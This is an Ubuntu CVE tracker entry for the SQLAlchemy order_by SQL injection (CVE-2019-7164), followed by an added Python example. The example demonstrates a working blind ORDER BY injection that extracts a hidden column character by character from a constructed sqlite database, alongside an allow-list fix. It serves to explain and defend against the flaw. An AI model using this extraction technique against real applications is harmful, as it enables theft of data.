Candidate: CVE-2019-7164
PublicDate: 2019-02-20 00:29:00 UTC
References:
 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7164
Description:
 SQLAlchemy through 1.2.17 and 1.3.x through 1.3.0b2 allows SQL Injection via the order_by parameter.
Ubuntu-Description:
Notes:
 mdeslaur> since 1.0, sqlalchemy issues a warning when text() is omitted
 mdeslaur> the fix for this issue turns the warning into an error
 mdeslaur> since this change may break existing applications, it may not
 mdeslaur> get fixed, marking priority as low
Bugs:
 https://github.com/sqlalchemy/sqlalchemy/issues/4481
 http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=922669
 https://github.com/sqlalchemy/sqlalchemy/issues/4538 (example regression)
Priority: low
Discovered-by:
Assigned-to:
CVSS:
 nvd: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H [9.8 CRITICAL]
 nvd: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H [9.8 CRITICAL]

Patches_sqlalchemy:
 upstream: https://github.com/sqlalchemy/sqlalchemy/commit/30307c4616ad67c01ddae2e1e8e34fabf6028414
upstream_sqlalchemy: needs-triage
precise/esm_sqlalchemy: DNE
trusty_sqlalchemy: ignored (reached end-of-life)
trusty/esm_sqlalchemy: DNE (trusty was needed)
xenial_sqlalchemy: ignored (end of standard support, was needed)
esm-infra/xenial_sqlalchemy: needed
bionic_sqlalchemy: needed
cosmic_sqlalchemy: ignored (reached end-of-life)
disco_sqlalchemy: ignored (reached end-of-life)
eoan_sqlalchemy: not-affected (1.2.18+ds1-2ubuntu1)
focal_sqlalchemy: not-affected (1.2.18+ds1-2ubuntu1)
groovy_sqlalchemy: not-affected (1.2.18+ds1-2ubuntu1)
hirsute_sqlalchemy: not-affected (1.2.18+ds1-2ubuntu1)
impish_sqlalchemy: not-affected (1.2.18+ds1-2ubuntu1)
jammy_sqlalchemy: not-affected (1.2.18+ds1-2ubuntu1)
devel_sqlalchemy: not-affected (1.2.18+ds1-2ubuntu1)
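The following is an added example, not code from the advisory or from the SQLAlchemy project. It illustrates why a plain string reaching order_by() is an injection sink and what the version-independent fix looks like. To run without SQLAlchemy installed it uses only the standard-library sqlite3 module and models the old implicit text coercion as straight string interpolation into the ORDER BY clause; the table, rows, function names and the allow-list mapping are all constructed for the example. ORDER BY does not echo the injected expression, so the attack shown is a blind one: a CASE expression flips the sort direction depending on a condition over a column the endpoint was never meant to expose. Note that wrapping attacker input in text() only silences SQLAlchemy's warning (or, after the fix, the error); it does not make the string safe. The fix that holds on every version is to map the request parameter through an allow-list to a column object, as the hardened function does here with column names.

```python
import sqlite3

# Constructed sample data (not from the advisory): two users, each with a
# column the listing endpoint is never supposed to expose.
SAMPLE_USERS = [
    ("alice", 1, "s3cr3t-a"),
    ("bob", 2, "s3cr3t-b"),
]

# Allow-list of user-facing sort keys -> real column names (hypothetical).
# Untrusted input selects an entry here and never reaches the SQL text.
ALLOWED_SORT_COLUMNS = {"name": "name", "id": "id"}


def open_sample_db():
    """In-memory SQLite database seeded with the constructed rows above."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (name TEXT, id INTEGER, secret TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", SAMPLE_USERS)
    return conn


def list_users_vulnerable(conn, order_by):
    """Models the pre-fix behaviour: a plain string handed to order_by() was
    coerced to SQL text and emitted verbatim, which is equivalent to pasting
    the request parameter straight into the ORDER BY clause."""
    sql = "SELECT name, id FROM users ORDER BY " + order_by
    return conn.execute(sql).fetchall()


def list_users_hardened(conn, sort_key, descending=False):
    """Only an allow-listed key selects a column; anything else is rejected
    before any SQL is built. Direction is a boolean, not attacker text."""
    if sort_key not in ALLOWED_SORT_COLUMNS:
        raise ValueError("unsupported sort key: %r" % (sort_key,))
    column = ALLOWED_SORT_COLUMNS[sort_key]
    direction = "DESC" if descending else "ASC"
    sql = "SELECT name, id FROM users ORDER BY %s %s" % (column, direction)
    return conn.execute(sql).fetchall()


def oracle_payload(condition_sql):
    """ORDER BY payload: rows come back by id ascending when the condition is
    true and by id descending when it is false, so the row order leaks one
    boolean per request (blind injection)."""
    return "(CASE WHEN (%s) THEN id ELSE -id END)" % condition_sql


def leak_secret(conn, victim_name, alphabet, length):
    """Recover `length` characters of the victim's hidden column through the
    vulnerable endpoint, using nothing but the order of the returned rows."""
    recovered = ""
    for pos in range(1, length + 1):
        for ch in alphabet:
            cond = ("substr((SELECT secret FROM users WHERE name='%s'),%d,1)='%s'"
                    % (victim_name, pos, ch))
            rows = list_users_vulnerable(conn, oracle_payload(cond))
            if rows[0][1] == 1:          # ascending by id => condition held
                recovered += ch
                break
        else:
            break                        # no candidate matched; stop here
    return recovered


def hardened_rejects(conn, sort_key):
    """True if the allow-listed endpoint refuses the given sort key."""
    try:
        list_users_hardened(conn, sort_key)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    db = open_sample_db()
    print(list_users_vulnerable(db, "name"))
    alphabet = "abcdefghijklmnopqrstuvwxyz0123456789-"
    print("leaked:", leak_secret(db, "alice", alphabet, 8))
    print("hardened rejects payload:", hardened_rejects(db, oracle_payload("1=1")))
```

The same shape applies to a real SQLAlchemy query: resolve the request's sort key through a dictionary to a column attribute (for example `{"name": User.name}`) and pass that object to order_by(), so the upgrade that turns the warning into an error has nothing to trip over.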